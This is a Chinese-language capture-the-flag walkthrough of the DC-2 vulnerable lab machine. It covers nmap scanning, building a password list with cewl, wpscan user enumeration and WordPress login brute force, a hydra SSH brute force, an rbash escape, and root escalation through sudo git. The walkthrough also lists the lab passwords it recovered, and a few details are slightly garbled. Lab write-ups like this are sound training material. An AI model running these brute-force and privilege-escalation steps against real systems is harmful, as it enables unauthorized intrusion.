渗透测试靶场实战-DC-2
一,下载资料
链接:https://pan.baidu.com/s/1VtAsxjyLOcanSsqfN_YRHw
提取码:u7yz
二,环境搭建:靶机:172.16.43.141
攻击机kali:172.16.43.70
三,信息收集
(1)当前网络活跃主机:nmap -sP 172.16.43.0/24 -oN nmap.sP
(2)扫描端口服务:nmap -A 172.16.43.141 -p 1-65535 -oN nmap.A
80 好像就开了80端口了
(3)有一个重定向到http://dc-2 需要给一个本地的解析
在windows/system32/drivers/etc/hosts 增加:/172.16.43.141 DC-2记录
(4)在访问80网址:http://172.16.43.141 正常 是访问不了的
信息收集:是:wordpress框架
kali工具: 攻防演练中:要根据网站的信息编辑一个字典 用Cewl工具
输入命令:cewl dc-2 >pwd.dic
(5)目录遍历:扫描一下目录 dirsearch -u http://dc-2
(6)访问:http://dc-2/wp-includes/
版本内核:7.xdrupal漏洞
(7)利用wpscan工具进行网站用户名猜测
输入命令:wpscan --url http://dc-2 -e u //-u 爆破出网站的用户名
(8)做一个用户名字典 vim user.txt
(9)根据目录扫描-找到网站后台 http://dc-2/wp-login.php
(10)可以利用BURP/wpscan进行爆破:wpscan --url http://dc-2 -U user.txt -P pwd.dic
五,系统层面
- 尝试登录用tom用户进行登录
用户1:Tom 密码:parturient
没有什么较好的信息,换下个用户进行登录
(2)登录 用户2Jerry 密码:adipiscing
看到了flag2 没有什么收获。。。
(3)尝试爆破7744 ssh
hydra -L user.txt -P pwd.dic 172.16.43.141 ssh -s 7744 -o hydra.ssh -vV
(4)登录tom用户:用户名:tom 密码:parturient
输入命令:ssh tom@172.16.43.141 -p 7744
(5)找到了flag3, 但是查看不了 没有权限 echo $0 rbash
六,提权
(1)需要绕过这个限制:
BASH_CMDS[a]=/bin/sh;a //变量给a
$ /bin/bash //将命令给它就可以了
export PATH=$PATH:/bin/ //导入环境变量
export PATH=$PATH:/usr/bin //导入环境变量
(2)线索引到了jerry账户
(3)尝试 登录:已经得到了jerry的密码了:
用户名Jerry 密码adipiscing
(4)发现了flag4
(5)sudo -l history 发现有个git命令 可以以root权限执行命令
输入命令:sudo git -p --help //强制进入交互状态
!/bin/bash
(7)进入root目录下 cat final-flag.txt
这就拿到了主机的root权限
总结:
1,根据80端口-写入hosts文件-cewl制作密码字典
2,暴力破解后台-不同用户去尝试登录-再去收集有用信息 ls -a 敏感文件 sudo -l history命令
3提权:BASH_CMDS[a]=/bin/sh;a git提权